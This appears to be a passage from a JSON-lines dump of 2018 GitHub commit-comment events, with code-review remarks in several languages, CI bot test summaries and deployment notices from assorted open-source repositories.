{"id":"8026257003","type":"CommitCommentEvent","actor":{"login":"batflyer"},"repo":{"name":"starling-lab/starling.utdallas.edu"},"payload":{"comment":{"id":29853061,"position":null,"line":null,"path":null,"commit_id":"48836d65a7027c93500c3bb9ce4a4578cb71f9e7","created_at":"2018-07-27T02:50:46Z","updated_at":"2018-07-27T02:50:46Z","author_association":"MEMBER","body":"I missed this the other day. Should we deploy now, or get the reading group list in at the same time?"}},"created_at":"2018-07-27T02:50:46Z"}
{"id":"8026259382","type":"CommitCommentEvent","actor":{"login":"bonchii"},"repo":{"name":"shiorimasu/pra"},"payload":{"comment":{"id":29853063,"position":54,"line":430,"path":"index.html","commit_id":"c4d39c5598545cef3782b6175510b7f306e7327a","created_at":"2018-07-27T02:51:41Z","updated_at":"2018-07-27T02:51:41Z","author_association":"NONE","body":"処理の流れはとてもきれい。あとは、できれば同じような処理をさせる場合はfunction定義して、引数、戻り値などを駆使してコード量を減らし、保守性と可読性よくしてあげると良いと思います！"}},"created_at":"2018-07-27T02:51:41Z"}
{"id":"8026260948","type":"CommitCommentEvent","actor":{"login":"zhu18"},"repo":{"name":"jusfoun-FE/jusfoun-FE.github.io"},"payload":{"comment":{"id":29853064,"position":null,"line":null,"path":null,"commit_id":"e99d9216095e9e34ce3f218a18afb8721ad0cc13","created_at":"2018-07-27T02:52:15Z","updated_at":"2018-07-27T02:52:15Z","author_association":"CONTRIBUTOR","body":"测试"}},"created_at":"2018-07-27T02:52:15Z"}
{"id":"8026263412","type":"CommitCommentEvent","actor":{"login":"tinogomes"},"repo":{"name":"tinogomes/AssaultCube-Maps"},"payload":{"comment":{"id":29853066,"position":null,"line":null,"path":null,"commit_id":"9285d973bd8ac7e987bafc1f23ab159409a8287e","created_at":"2018-07-27T02:53:14Z","updated_at":"2018-07-27T02:53:14Z","author_association":"OWNER","body":"@fabsongames \r\n\r\nOlhei no seu repositório e não encontrei nada. Mas OK."}},"created_at":"2018-07-27T02:53:14Z"}
{"id":"8026266887","type":"CommitCommentEvent","actor":{"login":"mayukhdas"},"repo":{"name":"starling-lab/starling.utdallas.edu"},"payload":{"comment":{"id":29853068,"position":null,"line":null,"path":null,"commit_id":"48836d65a7027c93500c3bb9ce4a4578cb71f9e7","created_at":"2018-07-27T02:54:29Z","updated_at":"2018-07-27T02:54:29Z","author_association":"MEMBER","body":"Deploy now. \r\n\r\nI have not yet finished preparing the RG list."}},"created_at":"2018-07-27T02:54:29Z"}
{"id":"8026270459","type":"CommitCommentEvent","actor":{"login":"marianofreddi"},"repo":{"name":"back-pack/tienda-asothella"},"payload":{"comment":{"id":29853073,"position":null,"line":null,"path":null,"commit_id":"bc08172cd31226d0c4f15a1c5ce01fcee8f0f9cc","created_at":"2018-07-27T02:55:54Z","updated_at":"2018-07-27T02:55:54Z","author_association":"NONE","body":"Mira la macana que me mande @ozeberle . creo que fué cuando hice el push f66d551, el vscode me tiro un error y me pidió que hiciera un pull antes del push cuando hice el. o algo de eso.. ¬¬ \r\nEstas lidiando con un mono."}},"created_at":"2018-07-27T02:55:54Z"}
{"id":"8026272628","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29853075,"position":null,"line":null,"path":null,"commit_id":"16c8e5bb250e24fbe942baa9ded140022d9b5777","created_at":"2018-07-27T02:56:42Z","updated_at":"2018-07-27T02:56:42Z","author_association":"OWNER","body":"There has got to be some kind of warning we can turn on to prevent such circular instances!"}},"created_at":"2018-07-27T02:56:42Z"}
{"id":"8030527633","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863352,"position":null,"line":null,"path":null,"commit_id":"fd38569fa7be50f0cddc03d6d77c19ec33bfa0c8","created_at":"2018-07-27T20:00:05Z","updated_at":"2018-07-27T20:00:05Z","author_association":"OWNER","body":"Great to see `make doc` added.  However, it doesn't quite work with the Makefile rule.  After creating the documentation, you move some of the files to the doc folder.  For the html files are missing in the doc folder, so the html view is incomplete.  For the latex file, I believe the pdf is correct, but the tex file likely won't compile because image files are missing.  I think it would be fine to have html and latex folders, without the need for a doc folder.  Then you wouldn't have to worry about the makefile rule to move files."}},"created_at":"2018-07-27T20:00:05Z"}
{"id":"8030528992","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863358,"position":42,"line":32,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T20:00:22Z","updated_at":"2018-07-27T20:00:22Z","author_association":"NONE","body":"если написать в консоли свой метод, который будет складывать 1 и 2, то он **вернет** 3\r\nвот так:\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   1 + 2\r\n2.5.0 :003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n => 3\r\n2.5.0 :005 > a = some_method\r\n => 3\r\n2.5.0 :006 > a\r\n => 3\r\n2.5.0 :007 >\r\n```\r\nвидно, что если результат работы метода присвоить переменной, то в ней окажется значение 3, т.е. результат вычислений... потому что именно его **возвращает** метод\r\n\r\nа можно переписать этот же метод, так, что он будет **выводить** значение:\r\n\r\n```\r\nirb\r\n2.5.0 :001 > def some_method\r\n2.5.0 :002?>   puts 1 + 2\r\n2.5.0 :003?>   end\r\n => :some_method\r\n2.5.0 :004 > some_method\r\n3\r\n => nil\r\n2.5.0 :005 > a = some_method\r\n3\r\n => nil\r\n2.5.0 :006 > a\r\n => nil\r\n2.5.0 :007 >\r\n```\r\nи на этом примере видно, что хотя метод и **выводит** результат вычислений в консоль, но **возвращает** он `nil`, потому что именно это значение **возвращает** метод `puts`, который выполняется в последней строке нашего метода и в переменную присваивается возвращаемое методом значение, т.е. `nil`"}},"created_at":"2018-07-27T20:00:22Z"}
{"id":"8030531069","type":"CommitCommentEvent","actor":{"login":"tekknolagi"},"repo":{"name":"akkartik/mu"},"payload":{"comment":{"id":29863366,"position":null,"line":null,"path":null,"commit_id":"5fdd09c5f012037b3a0f67ae63597d0135c1fe39","created_at":"2018-07-27T20:00:50Z","updated_at":"2018-07-27T20:00:50Z","author_association":"CONTRIBUTOR","body":"Ideally this would also be clear in the resulting binary"}},"created_at":"2018-07-27T20:00:50Z"}
{"id":"8030535705","type":"CommitCommentEvent","actor":{"login":"jsonn"},"repo":{"name":"libarchive/libarchive"},"payload":{"comment":{"id":29863381,"position":7,"line":707,"path":"libarchive/archive_read_support_format_lha.c","commit_id":"2c8c83b9731ff822fad6cc8c670ea5519c366a14","created_at":"2018-07-27T20:01:57Z","updated_at":"2018-07-27T20:01:57Z","author_association":"CONTRIBUTOR","body":"It's for various historical reasons the spelling of the file format."}},"created_at":"2018-07-27T20:01:57Z"}
{"id":"8030536153","type":"CommitCommentEvent","actor":{"login":"illutek"},"repo":{"name":"illutek/bullensteeg"},"payload":{"comment":{"id":29863383,"position":null,"line":null,"path":null,"commit_id":"a9794d05207a0dd66dad97da8864d735275e9a98","created_at":"2018-07-27T20:02:04Z","updated_at":"2018-07-27T20:02:04Z","author_association":"OWNER","body":"our pets page will be the same for teven and reuen in out CMS"}},"created_at":"2018-07-27T20:02:04Z"}
{"id":"8030536281","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29863384,"position":12,"line":37,"path":"source/js/plugins/metadata.js","commit_id":"1767e9bd2c5ce9af7fb0233bee9e29db6b03dd87","created_at":"2018-07-27T20:02:06Z","updated_at":"2018-07-27T20:02:06Z","author_association":"MEMBER","body":"Hm. I don't think we should open a new window to view the metadata. Maybe we should show it as an overlay over the Diva window; Something like this:\r\n\r\nhttp://ddmal.github.io/diva.js/try/demo/iiif-external.html#\r\n\r\n(click 'details') -- obviously it needs to be a bit better in displaying it. "}},"created_at":"2018-07-27T20:02:06Z"}
{"id":"8030540011","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863389,"position":42,"line":32,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T20:03:00Z","updated_at":"2018-07-27T20:03:00Z","author_association":"NONE","body":"в этом и состоит разница между \"выводом\" и \"возвратом\".... \"вывод\" - это печать в консоли, \"возврат\" - это возврат значения, которое получается в результате работы какого-то метода\r\nэто значение можно присвоить в переменную, можно без присвоения сразу произвести с этим значением дальнейшие действия"}},"created_at":"2018-07-27T20:03:00Z"}
{"id":"8030542313","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29863399,"position":5,"line":246,"path":"source/js/toolbar.js","commit_id":"f55112db126c716bfc2f4c31d8c91272cf0e3402","created_at":"2018-07-27T20:03:34Z","updated_at":"2018-07-27T20:03:34Z","author_association":"MEMBER","body":"why is jshint complaining?"}},"created_at":"2018-07-27T20:03:34Z"}
{"id":"8030544519","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29863405,"position":null,"line":null,"path":null,"commit_id":"fe675cd29eff20ed032917ac5679703255bf78ef","created_at":"2018-07-27T20:04:06Z","updated_at":"2018-07-27T20:04:06Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-556](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-556).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-556-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T20:04:06Z"}
{"id":"8030545777","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863407,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-27T20:04:22Z","updated_at":"2018-07-27T20:04:22Z","author_association":"OWNER","body":"I didn't have a close look at the pytest messages.  An answer to your question is not immediately obvious to me.  Please create a new issue and include the summary of what is happening.  Please include a summary of the differences between your set-up and that off @niazim3 and @samm82.  This should include the versions of Python, pytest, OS, and anything else you can think of.  We should also get @szymczdm to run `make test` to see what output he gets.  You can ask @szymczdm to do this as part of the new issue."}},"created_at":"2018-07-27T20:04:22Z"}
{"id":"8030546128","type":"CommitCommentEvent","actor":{"login":"psybers"},"repo":{"name":"boalang/compiler"},"payload":{"comment":{"id":29863408,"position":7,"line":352,"path":"src/java/boa/runtime/BoaAbstractVisitor.java","commit_id":"1326ea8c94e67f99fedf80e8a6abb8b72bb8bc4d","created_at":"2018-07-27T20:04:26Z","updated_at":"2018-07-27T20:04:26Z","author_association":"MEMBER","body":"That might work.  You would have to probably subclass it.  Or just use the similar logic in the current visitor.\r\n\r\nThis visits all fields, we dont currently visit fields that are ‘primitive’.\r\n\r\nAlso the current boa visitor calls getast() at a certain point.\r\n\r\nAnd you would have to hook it up so the proper default behavior happens (for wildcards) and before/after work properly.\r\n\r\nIn general, a change in the proto typically incurs many changes elsewhere.  And those aren’t really documented and they typically dont cause a compile error if they aren’t mirrored/updated.  This is an engineering nightmare..."}},"created_at":"2018-07-27T20:04:26Z"}
{"id":"8030550716","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863416,"position":50,"line":38,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T20:05:35Z","updated_at":"2018-07-27T20:05:35Z","author_association":"NONE","body":"если в массиве будут объекты класса Поезд, то каждый из объектов будет хранить в своих аттрибутах все необходимые данные (номер, тип, цвет, количество вагонов - все что будет добавлено в качестве аттрибутов объекта класса Поезд)"}},"created_at":"2018-07-27T20:05:35Z"}
{"id":"8030550735","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29863417,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-27T20:05:36Z","updated_at":"2018-07-27T20:05:36Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-MacOS-10.9-clang: OK (2952 of 2956 tests passed, 0 test warnings)\n\nMessages:\n\n * 4 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 619\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.86%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T20:05:36Z"}
{"id":"8030550886","type":"CommitCommentEvent","actor":{"login":"zx2c4"},"repo":{"name":"julienXX/gophsters"},"payload":{"comment":{"id":29863419,"position":7,"line":123,"path":"src/main.rs","commit_id":"f1c4dce394108836bf6de4a59ca950995ccd6570","created_at":"2018-07-27T20:05:38Z","updated_at":"2018-07-27T20:05:38Z","author_association":"NONE","body":"That should probably expand to \"...\".\r\n\r\nAlso, rather than whack a mole, you might consider proper transliteration via [this random library](https://crates.io/crates/deunicode), or some other."}},"created_at":"2018-07-27T20:05:38Z"}
{"id":"8030552357","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863422,"position":27,"line":27,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:05:59Z","updated_at":"2018-07-27T20:05:59Z","author_association":"NONE","body":"И вот уже первое доказательство того, что станции не стоило разделять. Теперь, что-б вывести станции используется 2 метода, которые практический идентичны. И ни один из них не выполняет пункт ТЗ - Может выводить список всех станций по-порядку от начальной до конечной.\r\n\r\nЭтот метод удаляем, и в `station_list` - меняем имя переменной на `stations.each ...`. Кстати, когда мы просто читаем содержимое инстанс переменной, то можно к ней обращаться без символа `@`. Но когда перезаписываем, то уже нужен `@`."}},"created_at":"2018-07-27T20:05:59Z"}
{"id":"8030561846","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863443,"position":30,"line":30,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:08:20Z","updated_at":"2018-07-27T20:08:20Z","author_association":"NONE","body":"Вот второе доказательство. Получается, если придет первая, или последняя станция дупликат, то она добавится - так-как тут проверяются только внутренние станции."}},"created_at":"2018-07-27T20:08:20Z"}
{"id":"8030570806","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29863457,"position":null,"line":null,"path":null,"commit_id":"fe675cd29eff20ed032917ac5679703255bf78ef","created_at":"2018-07-27T20:10:38Z","updated_at":"2018-07-27T20:10:38Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-557](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-557).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-557-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T20:10:38Z"}
{"id":"8030573396","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863469,"position":31,"line":31,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:11:19Z","updated_at":"2018-07-27T20:11:19Z","author_association":"NONE","body":"Эта строка не совсем понятно зачем. На самом деле должно быть что-то среднее между 30 и 31 строкой. Верно, что нужно вставить на -2 индекс (только всех станций), а вот вставлять нужно станцию переданную аргументом. И стоит сделать ранний ретерн из метода, если станция уже существует."}},"created_at":"2018-07-27T20:11:19Z"}
{"id":"8030576142","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29863480,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T20:11:59Z","updated_at":"2018-07-27T20:11:59Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2394 of 2964 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 500 tests had: ESO small diffs.\n * 566 tests had: Table big diffs.\n * 362 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 87 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 21 tests had: ERR diffs.\n * 20 tests had: ZSZ small diffs.\n * 2 tests had: MTD diffs.\n * 10 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.77%25-red.png)</a> \n"}},"created_at":"2018-07-27T20:11:59Z"}
{"id":"8030578861","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863483,"position":36,"line":36,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:12:39Z","updated_at":"2018-07-27T20:12:39Z","author_association":"NONE","body":"Первую и последнюю станции нельзя удалять."}},"created_at":"2018-07-27T20:12:39Z"}
{"id":"8030580113","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":29863486,"position":null,"line":null,"path":null,"commit_id":"ff4ebe58962d3a603f5d64810714731285884011","created_at":"2018-07-27T20:12:57Z","updated_at":"2018-07-27T20:12:57Z","author_association":"MEMBER","body":"@sorawee do you see any potential issues with this?"}},"created_at":"2018-07-27T20:12:57Z"}
{"id":"8030583949","type":"CommitCommentEvent","actor":{"login":"nathcoder"},"repo":{"name":"GHCSCW/ProviderHub"},"payload":{"comment":{"id":29863492,"position":null,"line":null,"path":null,"commit_id":"c0464835b74f88eb79972c4b2dbdb5fc0c3b0188","created_at":"2018-07-27T20:13:52Z","updated_at":"2018-07-27T20:13:52Z","author_association":"NONE","body":"#30 added pipes and use of environment to set API URL\r\n#20 #23 Tweaked specialty viewing and returning\r\nFacility Address tweaks "}},"created_at":"2018-07-27T20:13:52Z"}
{"id":"8030593632","type":"CommitCommentEvent","actor":{"login":"kamronbatman"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29863512,"position":null,"line":null,"path":null,"commit_id":"5fbf1326158c73cbd34f1d00ecb9047359ae3986","created_at":"2018-07-27T20:16:14Z","updated_at":"2018-07-27T20:16:14Z","author_association":"CONTRIBUTOR","body":"Size collision, how interesting lol"}},"created_at":"2018-07-27T20:16:14Z"}
{"id":"8030595164","type":"CommitCommentEvent","actor":{"login":"rebeccawb"},"repo":{"name":"cucumber-ltd/feynman"},"payload":{"comment":{"id":29863514,"position":null,"line":null,"path":null,"commit_id":"6fd9c810fb7ee32032bdf3b16f852e547585d195","created_at":"2018-07-27T20:16:34Z","updated_at":"2018-07-27T20:16:34Z","author_association":"CONTRIBUTOR","body":"Nice\n> On Jul 27, 2018, at 11:04 AM, Matt Wynne <notifications@github.com> wrote:\n> \n> I'm glad you approve 😀\n> \n> In fact while you were writing this comment I just renamed abilities back to perspective (see 3396c3d <https://github.com/cucumber-ltd/feynman/commit/3396c3d3aa1a0b7539f3b99bc7daa8b1fe925557>)\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/cucumber-ltd/feynman/commit/6fd9c810fb7ee32032bdf3b16f852e547585d195#commitcomment-29861952>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ADqw0ocrKBQs1qI2_zCs4TqO19olZo7Rks5uK1ZKgaJpZM4VkSWF>.\n> \n\n"}},"created_at":"2018-07-27T20:16:34Z"}
{"id":"8030596377","type":"CommitCommentEvent","actor":{"login":"MarcusCalhoun-Lopez"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29863518,"position":14,"line":14,"path":"math/nanoflann/Portfile","commit_id":"891aaf3996d562e9e1640b310231c641fa7090db","created_at":"2018-07-27T20:16:51Z","updated_at":"2018-07-27T20:16:51Z","author_association":"CONTRIBUTOR","body":"Thanks for noticing this.\r\nIt should now be [fixed](https://github.com/macports/macports-ports/commit/0078bf70e3b1ab9529dd37474847c77b3edcceaa)."}},"created_at":"2018-07-27T20:16:51Z"}
{"id":"8030596906","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29863520,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T20:16:58Z","updated_at":"2018-07-27T20:16:58Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T20:16:58Z"}
{"id":"8030599308","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863527,"position":45,"line":45,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:17:32Z","updated_at":"2018-07-27T20:17:32Z","author_association":"NONE","body":"Тут `:train_route` нужно переименовать в `route`, см Station"}},"created_at":"2018-07-27T20:17:32Z"}
{"id":"8030599798","type":"CommitCommentEvent","actor":{"login":"Sleeplikelion"},"repo":{"name":"wiired24/ProjectPegasus"},"payload":{"comment":{"id":29863529,"position":null,"line":null,"path":null,"commit_id":"58b20d26677101ee9422d38a346369ef2ca50c3d","created_at":"2018-07-27T20:17:40Z","updated_at":"2018-07-27T20:17:40Z","author_association":"NONE","body":"zz"}},"created_at":"2018-07-27T20:17:40Z"}
{"id":"8030603491","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863535,"position":45,"line":45,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:18:37Z","updated_at":"2018-07-27T20:18:37Z","author_association":"NONE","body":"И current_station, у нас не будет ридером, а будет обычным методом. Лучше хранить индекс станции в инстанс-переменной, а не саму станцию, тогда перемещение - это просто изменение индекса на +/- 1"}},"created_at":"2018-07-27T20:18:37Z"}
{"id":"8030605430","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29863538,"position":null,"line":null,"path":null,"commit_id":"3b4ae0881af8557994afeb9a870616c8fe5357e6","created_at":"2018-07-27T20:19:05Z","updated_at":"2018-07-27T20:19:05Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-558](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-558).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-558-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T20:19:05Z"}
{"id":"8030613259","type":"CommitCommentEvent","actor":{"login":"DeyV"},"repo":{"name":"fzaninotto/uptime"},"payload":{"comment":{"id":29863549,"position":null,"line":null,"path":null,"commit_id":"e2f6bfe42da7b9e8e1416cf9e0668fd9fb5e4294","created_at":"2018-07-27T20:20:59Z","updated_at":"2018-07-27T20:20:59Z","author_association":"NONE","body":"still in good condition in fork https://github.com/AlexanderYW/uptime"}},"created_at":"2018-07-27T20:20:59Z"}
{"id":"8030613488","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29863551,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-27T20:21:03Z","updated_at":"2018-07-27T20:21:03Z","author_association":"MEMBER","body":"I don't see a `loadstring()` function anywhere in [Lua manual](http://www.lua.org/manual/5.3/manual.html).\r\n\r\nIt's intentional that loading from streams isn't supported (but I'll implement it if you think it's important)."}},"created_at":"2018-07-27T20:21:03Z"}
{"id":"8030613501","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863552,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-27T20:21:03Z","updated_at":"2018-07-27T20:21:03Z","author_association":"COLLABORATOR","body":"I fixed the `AssertionError` in 87766ae, so we don't need an issue for that."}},"created_at":"2018-07-27T20:21:03Z"}
{"id":"8030617970","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29863559,"position":null,"line":null,"path":null,"commit_id":"69eb5cf1a73531f6f57a775203fbcc3fd79179d0","created_at":"2018-07-27T20:22:07Z","updated_at":"2018-07-27T20:22:07Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/32/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/32//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/69eb5cf1a73531f6f57a775203fbcc3fd79179d0/32/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/69eb5cf1a73531f6f57a775203fbcc3fd79179d0/32/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/69eb5cf1a73531f6f57a775203fbcc3fd79179d0/32/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/master/69eb5cf1a73531f6f57a775203fbcc3fd79179d0/32/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-27T20:22:07Z"}
{"id":"8030618141","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863561,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-27T20:22:10Z","updated_at":"2018-07-27T20:22:10Z","author_association":"COLLABORATOR","body":"My `make` is clean (no errors), but @elwazana gets an error every time a filepath is used (which after the previous commit is 8 times)."}},"created_at":"2018-07-27T20:22:10Z"}
{"id":"8030618704","type":"CommitCommentEvent","actor":{"login":"Miha-x64"},"repo":{"name":"Miha-x64/reactive-properties"},"payload":{"comment":{"id":29863564,"position":44,"line":44,"path":"sql/src/main/kotlin/net/aquadc/properties/sql/jdbc-sqlite.kt","commit_id":"602558355d2936615ebec1622b92df7bb66ce43b","created_at":"2018-07-27T20:22:17Z","updated_at":"2018-07-27T20:22:17Z","author_association":"OWNER","body":"Thanks, never spotted this!"}},"created_at":"2018-07-27T20:22:17Z"}
{"id":"8030622512","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29863568,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-27T20:23:14Z","updated_at":"2018-07-27T20:23:14Z","author_association":"MEMBER","body":"> Can you elaborate what is \"our general library story\", I'm not aware of that?\r\n\r\ncc-wrapper injects `-isystem`, ld-wrapper injects  `-L`. Virtually everything else those do is headache-inducing tech debt.\r\n\r\n> And the same for rustc and all compilers in existence\r\n\r\nIt's a cost benefit trade-off based on how many packages use the compiler. It's always much better *for packages in that language* if compilers and standard libraries can be built separately. But obviously that means it's not worth messing with compilers for obscure language and I don't advocate for that. I am, in fact working with rustc and 